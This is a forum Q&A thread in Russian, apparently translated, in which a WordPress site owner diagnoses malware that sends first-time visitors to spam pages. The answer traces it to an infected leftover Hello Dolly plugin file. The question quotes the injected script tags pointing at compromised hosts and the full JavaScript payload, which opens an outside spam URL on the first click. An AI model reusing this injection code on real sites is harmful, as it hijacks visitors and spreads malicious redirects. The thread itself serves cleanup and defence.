Как найти источник неизвестного скрипта, включенного в заголовок?
Сайт под управлением Wordpress открывает спам-сайт в новой вкладке при первом нажатии для новых пользователей. Если вы переходите непосредственно по URL-адресу или посещали сайт ранее, вредоносное ПО не срабатывает. Если вы новый пользователь и переходите на страницу, например, из результатов поиска Google, то вы будете перенаправлены (через новую вкладку) на случайную спам-страницу. URL каждый раз меняется.
До сих пор я пробовал разные сканеры вредоносных программ (среди прочих Sucuri и Wordfence) безрезультатно. Я пробовал отключать все плагины, менять тему, обновлять Wordpress. Пробовал отключать предварительную выборку. Вредоносное ПО все еще присутствует.
Я обнаружил, что есть пять скриптов, которые каким-то образом включаются в заголовок. Глядя на источник при переходе на сайт в режиме инкогнито через результаты Google, я вижу присутствующие ссылки. Скрипты загружаются в шапку:
<script type='text/javascript' src='https://longtailmagic.com/domain/i.php' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php' id='hello_newscript4-js'></script>
Все пять кажутся случайными страницами под управлением Wordpress, обслуживающими один и тот же вредоносный скрипт. Глядя на слушателей событий, я вижу i.php:7 под click.
Изучив i.php, подаваемый с одного из сайтов, он имеет следующее:
localStorage.setItem('test', 'testValue');
if ((localStorage.getItem('test') !== null) && (localStorage.getItem('click') == null)){
var click_r = false;
document.addEventListener("click", function(){
if (click_r == false){
var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
document.cookie = "a=a; expires = " + date.toGMTString();
localStorage.setItem('click', 'click');
window.open("http://etbetrehyheartling.tk/index/?8131599557550");
click_r = true;
}
});
}
Есть ли способ найти источник, из которого эти скрипты генерируются и добавляются в заголовок? Миссия состоит в том, чтобы избавиться от ссылок на скрипты, это, кажется, способ избавиться от вредоносного ПО, перенаправляющего новых пользователей на спам-сайт. Я пробовал String Locator с разными ключевыми словами, чтобы приблизиться к источнику, но пока безуспешно.
![Безумие обратных вызовов в javascript [JS]](https://i.imgur.com/WsjO6zJb.png)
Ответы 1
Согласно различным блогам, это плагин Hello-Dolly, который был заражен. Удаление плагина решит проблему. Ознакомьтесь со статьей здесь https://wordpress.org/support/topic/suspected-malware/
Hello Dolly давно удалена, но действительно была включена в WP с самого начала. Просматривая файлы, я заметил, что "hello/hello.php" все еще присутствует. После удаления папки с файлом php вредоносное ПО исчезло. Спасибо.